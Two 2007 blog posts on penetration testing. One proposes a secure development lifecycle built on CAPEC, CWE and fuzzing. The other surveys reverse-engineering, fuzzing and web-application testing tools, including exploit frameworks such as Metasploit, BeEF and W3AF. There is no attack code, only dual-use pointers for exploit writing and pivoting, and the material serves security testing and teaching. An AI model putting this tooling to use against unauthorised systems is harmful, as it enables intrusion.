Pen-testing is an art, not a science
Penetration-testing is the art of finding vulnerabilities in software.
But what kind of an "art" is it? Is there any science to it? Is
pen-testing the "only" way or the "best" way to find vulnerabilities in
software?
When I took my first fine arts class, we learned that "art is for art's
sake" and "beauty is in the eye of the beholder". I spent some time
philosophizing on whether or not that was true. After years, I was never
able to prove those concepts wrong. However, I did learn something
interesting about art. If you're an artist trying to improve technique,
trying to sell art, or trying to send a message -- it all comes down to
one thing: goal setting and accomplishment. Does your artistic outlet
meet your needs towards your goal? Did you accomplish what you wanted
to?
Compliance "audits" and "education/awareness" vs. Security "testing"
and "assurance/process-improvement"
Many organizations are attempting to improve software security assurance
by improving process and technology. Others are just trying to increase
security awareness, or meet compliance objectives. Some are trying to
keep their heads above water -- and everyday they worry that another
breach will reach media attention or become a statistic on
Etiolated. For those who are showing
improvements and making software assurance a science and a reality --
they are few in number.
Microsoft started the trusted computing initiative via a memo from Bill
Gates in 2002. The end result was the Security Development Lifecycle
(SDL), a process to improve software security. The Open Web Application
Security Project (OWASP) was started in 2001, and began a project that
was completed last year called the Comprehensive, Lightweight
Application Security Process (CLASP), which utilized a lot of the
research OWASP members had been working on for years. Also in 2001, Gary
McGraw and John Viego wrote a book called Building Secure Software: How
to Avoid Security Problems the Right Way, which later became a
methodology for Cigital (Gary McGraw's company) to move software
security process knowledge into the hands of Cigital clients. Also last
year, McGraw released a new book, Software Security: Building Security
In, which is the culmination of his Touchpoints process model.
One year and one week after 9/11/2001, the National Strategy to Secure
Cyberspace was released for the public eye. The US Department of
Homeland Security created a National Cyber Security Division, which in
turn created a strategic initiative, the SwA Program (Software
Assurance). This program is based on one short, but very important part
of the National Strategy to Secure Cyberspace document, "DHS will
facilitate a national public-private effort to promulgate best practices
and methodologies that promote integrity, security, and reliability in
software code development, including processes and procedures that
diminish the possibilities of erroneous code, malicious code, or trap
doors that could be introduced during development". The current director
of the SwA Program is Joe
Jarzombek,
who is responsible for many important objectives, including the Build
Security In web portal. This
portal includes much of the on-going work from Cigital, NIST, MITRE, and
the DHS on software assurance process improvements.
The week of 9/11/2007, OWASP planned a huge event known as OWASP
Day. OWASP is planning
another OWASP Day with a March 2008 time frame for those of us who
missed out on the first one of its kind. One of the presenters in
Belgium, Bart De Win, gave a presentation on "CLASP, SDL, and
Touchpoints Compared". All three are really just books on secure
software processes, so comparing them at first seems a bit like doing a
bunch of book reports (and possibly subjective going back to the whole
"art is for art's sake" argument). Bart's comparison is interesting, but
I'm interested in what all three are missing. Towards the end of this
blog entry, I'll recommend a new secure software process that takes into
account security testing from both a software assurance model and a
penetration-testing model.
The premise behind having a software development lifecycle that takes
security into account is that at some point -- business analysts,
requirements writers, software architects, software engineers,
programmers, and/or testers will perform tasks that are part of a
process that involves security as a forethought. In other words, testing
"for security" is not done "after-the-fact", nor is it done "right
before release". Security testing before release is typically when
development hands-off the application to a support or operations team.
Quality testers refer to this as "operations testing". If security is a
total afterthought, quality testers usually call this "maintenance
testing". Both situations are really where penetration-testing is done,
which is usually accomplished by security professionals, usually in an
IT security team (or consultants hired by such a team). Many of these
individuals actually prefer a black-box assessment, where knowledge or
access to the configurations and source code is again an afterthought.
Some pen-testers prefer a "source-code assisted black-box assessment"
and would like access to the source code and configuration files, but
policy or other constraints limit this kind of access.
One of the questions that might come up here has to do with
penetration-testing as part of compliance objectives, such as
Sarbanes-Oxley, SAS70, HIPAA, or the dreaded PCI-DSS. In this situation,
you have assessors working in an auditor role. A very common trend is
for a PCI "approved scanning vendor" (ASV) to perform a penetration-test
using COTS "security scanners" which often require both customization
and "vulnerability verification". The verification comes into play
because scanners will often identify a vulnerability when it turns out
later that the vulnerability does not exist (a condition known as a Type
I error, or false positive). ASV's test once a year against a
"test-ground" network and web application approved by the PCI Council,
but nowhere does this process require the ASV to remove false positives
or customize their scanner tools. Most COTS security scanners simply
just work the first time against the ASV test-grounds. How often they
work or don't work against real-world networks and web applications
without proper customization is left as an exercise for the reader to
determine. Your guess is as good as mine.
What ever happened to full-disclosure, free information, and the
hackers?
Free security research has been available since the MIT
TMRC started
playing with mainframes and micros. The media and software manufacturers
to this day still don't understand the motivations, tools, and
techniques that hobbyist security researchers have employed -- much of
which has truly been the "art" of vulnerability finding. However, many
hobbyists turned to starting or joining up with businesses during the
dot-com era. The lost "art" of vulnerability finding made its way into
the corporate environment. Around 2001 and 2002, the largest of software
corporations (Microsoft was already mentioned) learned the benefit of
performing self-assessments, including secure code review and even
secure design inspection. Companies such as @Stake and Foundstone were
founded, often brought in to perform these reviews/inspections as
consultants, and then were both later acquired by Symantec and McAfee,
respectively.
Other security researchers (especially ones that were unable to take
part in the dot-com era success due to previous computer felony
convictions, or other disadvantaged situations such as living in a
third-world country) are possibly now what has become the criminal
underground of the Internet. There are still many people who find
themselves in between these two camps (gray hat hackers), but their
numbers are few compared to what they used to be. If penetration-testing
is still an art form, then these are the only people practicing it --
the black hat and gray hat hackers. It is quite possible that some of
the improvements in fuzz testing have come from these types in the past
few years, although even many of those people have started their own
companies or joined up with some larger organization. Where are the
"hacker groups" that remain out there?
Software manufacturers are beginning to understand the problem, and big
financials and e-commerce also have implemented their own secure
software processes. Gadi Evron gave a presentation where he called out
who was using fuzz testing in the corporate world earlier this year. The
word on the street is that financials and e-commerce are "fuzzing before
purchase," i.e. they won't buy a new product, especially a network
security device or the latest DLP-HIPS-NAC-UTM solution without running
an internally purchased Codenomicon, BreakingPoint Systems, Mu Security,
or beSTORM fuzz testing engine and doing the best they can to break it
first. "Fuzz before release" occurs when some vendors such as Microsoft,
Symantec, and Cisco build their own custom fuzz testing engines such as
FuzzGuru (Microsoft), SEEAS (Symantec), and Michael Lynn (Cisco -- oh
wait they sued him) -- I mean CIAG (oh wait they dismantled that
group, didn't
they?).
"The future is already here -- it's just unevenly distributed"
The quote above is taken from William Gibson to describe that the
situation that we're in doesn't apply to everyone. However, there are
some things that it obviously does apply to, which I'm about to cover.
Surprisingly futuristic, today's security testing tools are almost as
good as all of the ones mentioned in the previous section. This is
partially because fuzz testing isn't the end-all-be-all for security
testing. In fact, fault-injection and network security scanners (e.g.
Hailstorm and Nessus) also aren't the end-all-be-all in security
testing. Secure design inspection and secure code review are what make
the secure software processes actually work. However, testing tools for
secure inspection/review are few and far between. They're maturing very
slowly, and many penetration-testers, developers, and managers feel
that:
- Secure inspection/review tools have too many false positives for
developers to deal with, slowing down the programming phase
- Static analysis tools have more false negatives than runtime analysis
that combines fuzz or fault-injection testing, missing a lot of
vulnerabilities
- Design/code review cannot verify vulnerabilities as well as runtime
analysis, making removal of false positives that much more difficult
and time consuming
- Runtime analysis tools combined with fuzz testing and fault-injection
provides a much easier path to writing exploits
- Developers are difficult to work with and will never understand
security issues
- Automated source code analyzers don't support programming languages
or frameworks used
- It's cost-prohibitive to give every programmer a security testing
tool when licensed on a per-IDE basis
If myself or the vendors behind these products can put these notions to
rest -- let us give it a shot. In 2008 there is no reason that any of
the excuses above will apply for new software projects. Sure, there is
tons of existing code -- a lot of it in binary format -- much of it
legacy -- and worst of all: your company or organization still relies on
it without a plan to replace or even augment its functionality.
I feel as if I'm stuck in a similar situation using the primary software
pieces that I use everyday -- Firefox, IE, all the major browser-plugins
made by Adobe (Flash and Acrobat), Apple (QuickTime), or Sun
Microsystems (Java). Then there's the other software that I use made by
the likes of AOL, Mozilla + the usual suspects (Adobe, Apple, Mircosoft,
and Sun) in the form of instant messaging clients, productivity
applications (MS-Office, OpenOffice, iWork), and arts/entertainment
(Windows MediaPlayer, iTunes, Adobe everything, Apple everything). These
are the targets -- the important software that we need to keep secure.
Yet the only software manufacturer out of the list above that has a
secure software process and writes their own fuzz testing engine is
Microsoft. However, if we were able to secure these applications
properly then other software would instead be targeted. I use enough
embedded devices running some sort of burned-in software (that never or
rarely updates) to come to the realization of this outcome. I'm also one
of those types of security professionals that buys into some of the FUD
with regards to web applications (especially SaaS) and open-source
software used as third-party
components
in everything (the RNA to a full application's DNA).
The Continuous-Prevention Security Lifecycle
The reality is that all software needs to be properly designed and
inspected -- all software requires a secure software process. Earlier I
mentioned that the SDL, CLASP, and Touchpoints processes were "missing
something". While working on the matter, I have discovered some unique
approaches that extend and simplify the primary three secure software
process models. My suggested secure software process consists of only
four elements:
- Developers using Continuous Integration (Fagan inspection + coding
standards + unit testing + source code management + issue tracking +
"nightly" build-servers)
- MITRE CAPEC used in the design review ; Secure design inspection
performed using CAPEC
- MITRE CWE used in automated secure static code analyzers at
build-time ; Secure manual code review performed using CWE
- CAPEC and CWE-driven automated fault-injection and/or fuzz testing
tools at build-time measured with code coverage ; Verification of
non-exploitables vs. exploitables
All of the above steps can be performed by untrained developers except
for the parts after the semi-colons. For step 2, developers can use
Klocwork K7 or Rational Rose/RequisitePro along with security
professionals during secure design inspection, or provide the security
team with their UML designs or requirements. For step 3, a manual code
review workflow tool such as Atlassian Crucible can be used to combine
Fagan inspection with the necessary security sign-off to complete a
secure manual code review (to be completed on every check-in, component
check-in, or before every nightly/major build -- depending on the
environment). Step 4 verification process requires the most attention by
security professionals, although there is little reason that all
vulnerabilities found can be issued with a low priority and verified
before release. All the other steps are continuous and can be
performed/fixed everyday, possibly at every check-in of code -- but
usually at least once a day in the nightly build.
The most important part of my "Continuous-Prevention Security Lifecycle"
(CPSL) process is for developers to write unit tests that assert the
behavior of each defect's fix. This is known as continuous-prevention
development, and it's a special kind of regression test that works
especially well for security vulnerabilities because it:
- Tests for the bug, as well as can identify bugs with similar behavior
- Fixes the bug, and possibly any bugs that work in the same way if
generic enough
- Can be re-used in build-servers across projects
Penetration-testers should take special notice that my CPSL process does
not include any operations or maintenance testing. All of the testing is
done before quality testers (or developer-testers) even get to begin
system integration or functional testing. This type of security testing
is suggested to be done very early in the process, which follows similar
guidelines as the SDL, CLASP, and Touchpoints processes suggest.
The benefits and drawbacks of open-source software There are some
that may complain about my itemized suggestions based on a limited
budget. For those situations, open-source software can be used: e.g.
Fujaba instead of Klockwork K7, NASA's Software Assurance Technology
Center (SATC) Automated Requirement Tool
(ARM 2.1) instead of IBM
Rational RequisitePro, and Trac instead of Atlassian Crucible. If you
spent any time reading my last blog entry on 2007 Security Testing
tools in
review,
then you'll find gems such as PMD SQLi and FindBugs as reference secure
static code analyzers (as well as the many mentioned for PHP, ASP, and
Java web applications), plus countless of open-source fuzzers and
fault-injectors.
As for defining a secure software process for open-source software
projects, many of these are integrated or bundled with commercial
software. Which brings me to a few points. First of all, commercial
software developers should be testing third-party components in addition
to their own code -- anything that gets built on the build-server should
go through the same checks, imported or not. Bugs will get found and
fixed in open-source projects through this sort of effort, in addition
to open-source projects that operate under my CPSL or other secure
process. As a final point, it's no longer theoretical that "the world
can review open-source" thanks to efforts such as BUGLE: Google Based
Secure Code Review.
Software security assurance: Predictions for 2008
One of my predictions for 2008 is that we'll start to see individuals
and companies that have invested in penetration-testing skills move
towards awareness and compliance. The shift will in part be due to
security testing moving to a place earlier in the development lifecycle,
with "penetration-style" security testing tools being replaced with
"secure software process friendly" tools. Many new tools for secure
software process models will evolve from existing workflow management
and design inspection development tools. Classic, gray hat
"penetration-tester" tools such as automated fault-injectors and fuzzers
will become Ant tasks on a build-server. Security testing, if pushed
early in the life cycle, will actually improve code quality -- causing
less spending on quality testing at the cost of more time/dollars spent
on developer-testing.
Do not let all of this confuse you into thinking there isn't room for
major improvements to secure software processes, security testing tools,
or other security research. It's just a simple re-focusing of where,
who, and when security testing is done. This paradigm shift will allow
initiatives like Build Security In, CAPEC, and CWE to really take off.
New projects that concentrate on measuring and understanding false
positives are already in larvae stages. Combining data from CAPEC into
other projects such as the WASC Threat Classifications (in a similar way
that the OWASP T10-2007 used CWE data) will lead to new attack patterns
and ways of understanding current attack patterns. Maturity of CWE and
CVE data will drive results for
CWE-Compatible tools and services
to lead into CWE-Effective equivalents.
By allowing developers "in" on the security industry's closely-guarded
and well-kept secrets, we'll be able to protect applications in ways we
have never done in the past. Secure frameworks such as
HDIV will continue to improve, possibly to the
point where security testing isn't necessary for a large majority of
attack paths and security weaknesses. Exploitation countermeasures based
on AI might move into applications to prevent a large amount of
exceptions such as those explored during penetration-testing efforts. At
the very least we'll start to see distributed applications logout users
automatically or disable accounts that attempt automated
fault-injection, potential fraud, or other unwanted attacks. It's
possible that you'll even make a friend on a development team, or maybe
even become a full-time "security developer" yourself. There will always
be room for pen-tester artisans in the wild world of computer science
and software engineering.
Posted by Dre on Sunday, December 2, 2007 in
Defense,
Hacking,
Security and
Tech.
In my last post, I explored some ways of using formal method tools to
perform security
testing
in the most advanced scenarios. It may have been over the heads of many
people, so I wanted to offset that by talking to some basic tools which
I think anyone can utilize effectively assuming they bring the most
important tool when security testing: their brain.
Of course, you need to think like an attacker, and saying that, I can't
recommend a better source than CAPEC and their outreach and enhancement
documents. Books that
come highly recommended (read at least one of these) include:
- `The Web Application Hacker's
Handbook <http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470170778.html>`_
- `The Art of Software Security
Assessment <http://www.aw-bc.com/catalog/academic/product/0,1144,0321444426,00.html>`_
- `Hunting Security
Bugs <http://www.microsoft.com/MSPress/books/8485.aspx>`_
- `Security Power
Tools <http://www.oreilly.com/catalog/9780596009632/>`_
I really think that having some background in development practices is
also necessary, so I recommend other books such as:
- `Continuous Integration: Improving Software Quality and Reducing
Risk <http://www.aw-bc.com/catalog/academic/product/0,1144,0321336380,00.html>`_
- *Secure Programming with Static
Analysis*
- `Software Security: Building Security
In <http://www.aw-bc.com/catalog/academic/product/0,1144,0321356705,00.html>`_
- `The Security Development
Lifecycle <http://www.microsoft.com/mspress/books/8753.aspx>`_
If you want to write or develop exploits in addition to finding security
bugs there are a few must have books such as:
- `Fuzzing: Brute Force Vulnerability
Discovery <http://www.aw-bc.com/catalog/academic/product/0,1144,0321446119,00.html>`_
` <http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html>`_
- `The Shellcoder's
Handbook <http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html>`_
(2nd Edition)
- *Real World
Fuzzing*,
Charlie Miller, Toorcon 9 (to be included in a future book)
- `Writing Security Tools and
Exploits <http://www.syngress.com/catalog/?pid=3620>`_
If you have little operations background and want to learn how
modern-day systems and networks are protected, I highly recommend:
- `Network Security
Hacks <http://www.oreilly.com/catalog/netsechacks/>`_ (2nd Edition)
- `Virtual Honeypots: From Botnet Tracking to Intrusion
Detection <http://www.aw-bc.com/catalog/academic/product/0,1144,0321336321,00.html>`_
- `Preventing Web Attacks with
Apache <http://www.aw-bc.com/catalog/academic/product/0,1144,0321321286,00.html>`_
These books will introduce you to hundreds of tools - many of which are
useless, difficult to configure, difficult to understand, and/or about
as robust as the software you're trying to break. While learning some
background and technique is useful, by and large I think you'll get the
hang of a few tools that do one thing well and stick with them.
The most important and widely used security testing tool starts with
program understanding / comprehension. If you have source code for the
application, SciTE is an excellent
source code editor that can be scripted using a language that will
appear throughout this blog entry: Python.
Probably the best way to learn Python is to code Python to help you code
Python using SciTE. This will also introduce you to recursion and
meta-level concepts. However, you don't need to become an expert in
every programming language to use SciTE for secure code review -- all
you need to do is learn how to perform a manual
DFA (or
CFA) for
security weaknesses on each language one-time,
and then automate that DFA/CFA through Python scripts in SciTE.
Before manual code review, developers may have created program
specifications. In the last post I mentioned formal top-level
specifications, which is rare. More common may be UML models or DSD's.
Using open-source tools such as Fujaba, which
can move between UML models and Java code in Eclipse, may prove useful.
Ideally, this would be done using a formal UML tool such as the
commercial Rational
Rose, or
better -- one specifically for security design inspection, such as
Klocwork
K7.
There aren't any free or open-source tools that are specifically geared
towards secure design inspection, but expect this to change in the near
future. The best work I've seen lately has been done by the
Octotrike team, also recently spoke to at
Toorcon
9
as Privilege-Centric Security
Analysis.
As most security testers will come to understand, not all program source
is easily available. For .NET assemblies (CLR), try using the .NET
Reflector; Java can use
Jode; and Flash can use
Flasm or
Flare. There are some C and other
compiled-language decompilers, but consider using a debugger for your
language if it becomes too complex to easily decompile (or too
inaccurate). In other words, use a debugger such as the
basicDebugView
under Windows (for basic stuff), JSwat
for Java on any platform,
ImmDbg for
advanced Windows debugging, and IDA Pro
(for as many platforms as you own and have access to) if you really want
to rock.
Sometimes it might be better to work with some languages in their native
IDE instead of SciTE, such as using Visual Studio for .NET work, Eclipse
for Java, Flash for Flash, or Aptana for
Javascript. Again, it is often better to work from one solid tool than
to install and use several different tools, although there may be a few
one-off scenarios where you would want to use them. SciTE might not fail
you as often as you would think, especially if you use it as a code
reader (instead of relying on it to build code/classes like an IDE
would, which isn't really what you should be worried about - let the
developers do that hard work for you!).
IDA Pro, while being both an excellent debugger and disassembler, is a
cut above the rest, although I could name plenty of other tools in its
class. IDAPython is the language of
choice for such a tool, bridging over to Immunity Debugger and several
other tools. There is a free version of IDA
Pro, but any
serious person will shell out the money for the non-free version if they
value the primary tool in their toolchain.
Debugging web application client-side code such as Javascript can't get
any easier than by using FireBug,
although I have found myself wanting better representations of code
before using it. I can't recommend the Web Developer
Toolbar
functionality for viewing Javascript, source, and "generated source"
highly enough -- but also View Source
Chart,
DOM Inspector
(along with
InspectThis),
and UrlParams
in the sidebar. For Flash apps, there is the
FlashTracer add-on that can
also be used in the sidebar, which responds to trace operations (you may
need to put these in yourself), and also a local proxy called
Charles, which
supports Flash Remoting.
Viewing code and debugging code will help with program flow and
understanding. Some Python tools such as
HeapDraw and Python
Call Graph make great visualization
tools to aid in this type of work. You'll want to learn how to implement
automated DFA (data flow analysis), view control flow
graphs, basic block
graphs, and how to view
these under a scenario called hit-tracing. Hit-tracing will allow you to
watch the flow of the application only under certain conditions that you
want to see, while filtering out everything else. The
PaiMei tool will provide
this, and by doing so - you're really discovering an important aspect of
code known as coverage; how much the testing affects the code it runs
through.
There are right ways and wrong ways for both security testers and
developers to utilize code coverage in their testing approaches. Besides
the PaiMei tool, there are code coverage tools that are specific to
certain languages, and that often require flags at compile/build time.
gcov and lcov are
examples of code coverage tools that require being built in to the
software. Other approaches, such as NCover for
.NET, and EMMA for Java (using
EclEmma while in Eclipse) do not have this
requirement. There are even coverage
validators
available for Javascript.
Normally developers utilize code coverage during a recent invention of
quality testing made specifically for developers by developers called
"unit testing". Unit tests are quick 1-3 second checks in their IDE that
they can use to assert behavior and provide an instant fix. More
advanced unit tests called "component tests" can be done during a build,
along with mocks (fake database or other system necessary to assert
behavior of a fully implemented application). Typically these are all
for functional tests, and possibly also for performance. Rarely are
applications tested for security in this manner, and unit testing was
really built for functional tests (although they theoretically could be
adapted for security testing).
It's sometimes ok to pretend you're a developer just to see what idiotic
things they skip over when they write and build their code. In this
case, you will want to load the code into its native IDE (say, Eclipse
for Java). Then, promote all the warnings you can to errors, build, and
see what the environment spits out at you. Load automated static
bytecode analyzers, which often have a large amount of security checks
(e.g. FindBugs,
FxCop,
CAT.NET, and AspectCheck), as well as source code checkers -- and use
this time to write some of your own basic checks (especially to find
low-hanging fruit). For Java, PMD is
extensible through XPath, for an example see the PMD SQLi
Rules. Also check what demos are
available in terms of
CWE-Compatible tools - I've used
Fortify SCA to great
effect here. There are also plenty of open-source static analysis tools,
but many aren't as complete as their CWE-Compatible commercial cousins.
If you can find some basic unit tests to run (e.g.
Crap4J), these may
also provide better program understanding, especially when combined with
inspection tools such as Armorize
CodeSecure, Fortify
SCA, OunceLabs, Klocwork K7, GrammaTech
CodeSonar,
and the bytecode checkers (i.e. FindBugs, FxCop, CAT.NET, and
AspectCheck).
Security testers have created their own sort of unit tests which involve
injecting faults into an application, or even better -- sending random
or specially-crafted data to the application inputs -- often called
fuzzing or `fuzz testing'. Fuzz testing tools are numerous, although
one of the best tools is EFS,
which stands for Evolutionary Fuzzing System. EFS provides random data
to an application along with code coverage reports from PaiMei. It
enhances the tests using this code coverage data by implementing genetic
algorithms. Some of these tests cannot be solved, but a satisfiability
solver can provide extensive coverage beyond GA's in this situation.
STP,
zChaff, and
Saturn are examples of satisfiability
solvers, while catchconv
integrates these concepts as a
variant to
Valgrind (a popular dynamic analysis tool,
similar to IDA Pro, but focused mostly on memory debugging). Valgrind's
Memcheck,
DynamoRIO, Purify
(commercial), DynInst, and
Pin are actually dynamic binary
instrumention (DBI) tools which would work well with PaiMei's crash
binning
routines
when attempting to find off-by-one's and incrementing counter crashes
(and other issues that may be better found through formal method
security testing).
Random fuzzing along with code coverage is probably one of the most
advanced tools in a security tester's toolbox. However, there are some
cases where binary protocols hit protocol parsers on both sides of a
connection. Tools such as
ProxyFuzz
and Universal
Hooker can make
it easy to determine whether one side or both sides of a connection
require more than just random fuzz testing. If this is the case, a lot
of manual work may be required to determine which parts of the data are
encrypted (if any), compressed (if at all), or separated by TLV's (type,
length, or values). Using a specification may be the easiest way to
implement a specially-crafted fuzz testing tool for the "application
under test" (AUT). Using a fuzzing framework such as
Sulley
or Peach can make building this
tool much easier than doing so by hand. In some cases, files (not
protocols) are loaded or unloaded by applications. Certain fuzz testing
tools work specifically well for writing random or specially-crafted
files, and others are provided by frameworks. Depending on the platform
or type of application you're targeting, you'll want to look at a few
different file fuzzing tools/techniques, but
FileFuzz (by Mike
Sutton) seems to stand out as a good starting point (similar to
ProxyFuzz for protocols). For other file fuzzing tools, see
FileP (my favorite,
written by Tim Newsham),
SPIKEfile and
notSPIKEfile,
Ufuz3,
FuzzyFiles, and
Mangle. I'll leave
targeting browsers, web servers, and web applications with fuzz testing
techniques for later, but these should give you a general idea of what
is available. There's also fuzzing environmental variables, in-memory,
etc. Note that Sulley,
Peach, and FileP are all Python frameworks for coding specially-crafted
fuzz testing tools.
Often there are situations where rolling your own fuzz testing framework
or dissecting a protocol or file format may seem like the last thing you
want to do. Prototyping this work should be a first step to determine if
the effort is worthwhile. I gave examples of using both ProxyFuzz and
uhooker as starting points. Combine this with code coverage, and check
to see if the results show how well you've tested. Before starting a
fuzz testing project using a framework or writing your own tool (or a
full-blown client), you may want to do a few more checks. This is where
knowledge of bash and C can come in as extremely helpful. Small C
programs are fast, easy to write if you're just trying to do one thing
well (run a looped test), and can be easily piped on the Unix command
line to "try different things out". The bash shell provides ease of use
when writing loops or conditionals for a bunch of small programs piped
together, to combine speed with agility and flexibility in prototyping.
Using the Matasano Blackbag tools (or by writing your own tools similar
in nature/effect), it becomes easier (and more fun) to reverse binary
protocols/formats than by reading specs and building run-once Python
scripts. Of course, finding the Matasano Blackbag tools may be difficult
as they now recommend writing protocol
dissectors
using Ruby along with
BitStruct. A commenter
posts using Construct with Python,
as well as the popular scapy
Python library found quite often in the literature.
Almost a lost art, but related to file fuzzing and binary protocol
dissection is binary analysis. Many continue to use IDA Pro to perform
these sorts of bug-finding techniques, using IDC scripts such as the one
by Halvar Flake, BugScam.
Tools such as bugreport,
BEAST and
OBOE can also be used, but it may be better to re-write this
functionality in IDAPython, possibly by using x86 emulators, or PEiD to
remove potential code obfuscations. Halvar Flake's company, SABRE
Security, also maintains the best tools
for program analysis, debugging, and testing for security. The primary
reference tool, BinNavi, works on embedded processors as well as most
platforms you can think of. I've heard he can make it available to
people who cannot afford it depending on your project scope.
BinNavi/BinDiff have simply the best reputation in the business, and
like PaiMei, require IDA Pro.
After a security-related bug is found (using automated inspection,
automated fault-injection, automated random fuzzing, or by partially
automating specially-crafted fuzz testing, binary analysis, or code
review), some will choose to report it to vendors, some will write
exploits, and some will do none of the above. If an exploit is intended
to be written, you'll find lots of support for doing so using the
Immunity
Debugger
and the Metasploit package. There are some automated exploit writers
including the MSF-eXploit
Builder,
Byakugan/noxdbg, and
Prototype-8. Python
appears to be dominant for exploit writing were it not for the
Metasploit project, which has moved to Ruby. If the focus of a security
testing team is dominant towards writing exploits, then it is suggested
that Ruby equivalents replace SciTE, ImmDbg, IDAPython, PaiMei, and the
various fuzzing frameworks and tools already mentioned, or that security
testers learn both Python and Ruby equally well.
Writing exploits for web applications is a quite different matter. There
is a reference platform for fault-injection and fuzz testing of web
applications, which provides source for every vulnerability check.
Unfortunately, it's the commercial Cenzic
Hailstorm.
Also unfortunately, this means learning another language: Javascript,
but web application security testers should possibly make learning
Javascript (and Flash) a priority over Python, C, or Ruby. CORE
Impact (also commercial) has begun to
add the low-hanging fruit exploits (although they claim no XSS yet), and
it is imagined that ImmunitySec will do so as well (and these could be
open-sourced like the SQL
Hooker tool). For
now, the Metasploit, GNUCITIZEN
AttackAPI, and the
BeEF framework appear to be the
dominant exploit tools for web applications. The
W3AF framework uses BeEF, but also
includes many modules (some pinned for future release) that allow for
pivoting including an RFI proxy, as well as using log or source code
information to continue a more advanced attack. There are concepts such
as XSS Tunneling (to run Nessus or similar through a man-in-the-browser
exploit) and W3AF's Virtual Daemon (integrating web application exploits
with Metasploit payloads).
In fact, finding web application vulnerabilities is often more than just
program understanding along with standard fault-injection and fuzz
testing. There are many intricacies to finding XSS and SQLi -- even
other critical vulnerabilities such as HTTP Splitting/Smuggling can take
many forms (see: Amit Klein on
HRS).
Fortunately, many of these are covered in The Web Application Hacker's
Handbook, in fairly clever detail. The book even covers triple-encoded
XSS attacks, second-order SQLi, OOB SQLi, and inference attacks. Almost
all examples use the Burp Suite, as the
primary author (Portswigger) also wrote that tool. The book makes
special mention of some other
point-tools, including the
aforementioned inference attacks using
Absinthe. SQLi
can also benefit from non-standard methods such as using
PQL.
Earlier in this entry, I mentioned some Firefox add-ons such as
UrlParams. There exists a similar add-on that can be used as an HTTP
editor (but only to modify requests, not responses):
TamperData. While mentioned in
Portswigger's book, he doesn't cover it as well as he should. TamperData
can be opened in the sidebar and looks surprisingly similar to UrlParams
-- this has great benefit, especially when testing for low-hanging fruit
SQLi, XSS, and HRS vulnerabilities; as well as path traversal, logical
flaws, URL redirection, and similar vulnerabilities which require direct
tampering of the HTTP request headers. If you want to build advanced
attacks, besides Hailstorm or Burp Scanner/Suite I can also recommend
Wfuzz (written in Python)
and
CAL9000
(a browser driver, ideal for testing XSS in several different browsers
using the same tool). Of course, there is the original HTTP/CGI attack
tool, which has recently made a comeback as Nikto
2.
One tool is mentioned that I had not heard of before, and interestingly,
the approaches given to attack authentication, session management, and
access control are very different than the approaches that I propose
(and the tools that I use). The
CookieWatcher
add-on is proposed as a way of looking for session ID's in applications
under test. This is an excellent idea, and I've already integrated it
into my testing strategies, as it is easy to change which session ID
type you are looking for (it's the only tool option/preference, which
has a drop-down menu that shows a list of cookies seen), delete, or copy
(as well as view it in the status bar). While the lack of options is
somewhat aggravating, the add-on works well along with
CookieSwap (to
have switchable cookie profiles),
CookieSafe (to
turn first and third party cookies off on a case-by-case basis),
CookieCuller (to permanently protect
cookies), and Add N Edit Cookies
(to use the Cookie Editor to modify content, path, security, or expire
information, as well as to add completely new cookies). WebScarab,
Stompy, and the forthcoming
Burp
Sequencer
are probably excellent tools for session ID analysis, and the book
covers how to do this in detail, while pointing to the excellent NIST
FIPS 140-2 standard, which has four levels of validation criteria.
Interesting characteristics that may affect authentication or session ID
randomization include IP address, BGP prefix, DNS forward or reverse
entries, time, and HTTP Referer or User-Agent. Tools such as
RefControl, User Agent
Switcher,
Tor, and
pbounce should be used
when testing for authentication (IP, DNS, and Referer authentication
checks should also be configuration or source-code assisted if
possible).
A lot of the functionality of the Burp Suite is utilized rather
effectively in the book as well. However, the lack of inclusion of
certain web application security aspects, such as Ajax security,
automated DOM-based XSS scanning, and Web services security also happen
to be problems with the Burp Suite itself. For Ajax crawling, I suggest
checking out all the work done by Shreeraj
Shah (especially Crawling Ajax-driven
Web 2.0
Applications
and Scanning Ajax for XSS entry
points), including
his new BlueInfy tools. For DOM-based
XSS, the W3AF tool has a
module to support this
that is equivalent to Shreeraj's work. Web services security is also
best covered by Shreeraj Shah, although there will be a few books coming
out in the next month that should re-address the issues of Ajax and Web
services rather well. From my experience, the OWASP
Interceptor
tool, as well as the commercial (free limited version)
SOAPSonar tool are good starting points
for Web services security testing outside of Shreeraj's tools already
mentioned. There are fuzzers, including the OWASP
WSFuzzer,
SIFT,
and iSecPartner's WSBang,
as well as generic XML fuzzers such as
untidy and
Schemer.
It is strange that without mentioning much about Ajax, XML, or Web
services that the authors included a very detailed section on JSON
Hijacking and CSRF. While I was familiar with both CSRF
dorks and CSRF
Redirectors, the
book contains excellent material on how to test (although does not
provide a tool reference). Most recently, OWASP released a new project
called
CSRFTester,
which looks promising. OWASP has a lot of great projects, but their
integration (I agree with Ory
Segal
on this) could be vastly improved. There are very unique tools such as
Pantera
(Python extensible) and
ProxMon (also Python
extensible) that do passive analysis for web application security
testing, which can save countless hours of manual penetration-testing
using TamperData or Burp Suite. I often wish that other tools such as
the THC releases and
Foundstone free
tools could
also be combined, as I often reference these tools for the SSL checking
support as well as a variety of other reasons.
Other tools such as
DirBuster,
JBroFuzz, and DFF
Scanner can be used for
predictable resource locations (PRL) -- especially while using ProxMon
or Pantera passive analysis techniques (or by using these with
FileMon/RegMon/Process Monitor on the Windows IIS web server, or strace,
lsof, fstat, ktrace, or truss on the Apache/Unix web server). I expect
the w3af and Burp Scanner will both integrate full Javascript crawlers,
Flash walkers, and other advanced RIA features in the future -- which
could even surpass the CWE-Compatible web application security scanners
out there. In addition to this, they should add passive analysis tools
and work with "agents" available in "white-box assisted" tests, such as
the case with ImmunitySec's SQL Hooker as well as the PRL techniques
described at the beginning of this paragraph. There will probably be
four different types of agents: 1) the standard local proxy that sits in
between the browser and the web server, 2) an agent that monitors the
code/files/services/queries on the web server, 3) a proxy agent that
sits in between the web server and database server (or other external
services) and monitors like a testing spy (e.g. JDBC spy), and 4) an
agent that monitors the code/queries on a database server or other
external web service. Nobody has built this yet, but since we're on the
topic, this is what I'd like to see in modern web application scanning
tools. Maybe these agents or passive tools will also be able to measure
code coverage and web surface coverage in a similar way that the
commercial tools, Fortify
Tracer and Chorizo
Scanner (and the open-source
Grabber/Crystal)
accomplish this through bytecode instrumentation or other hooks.
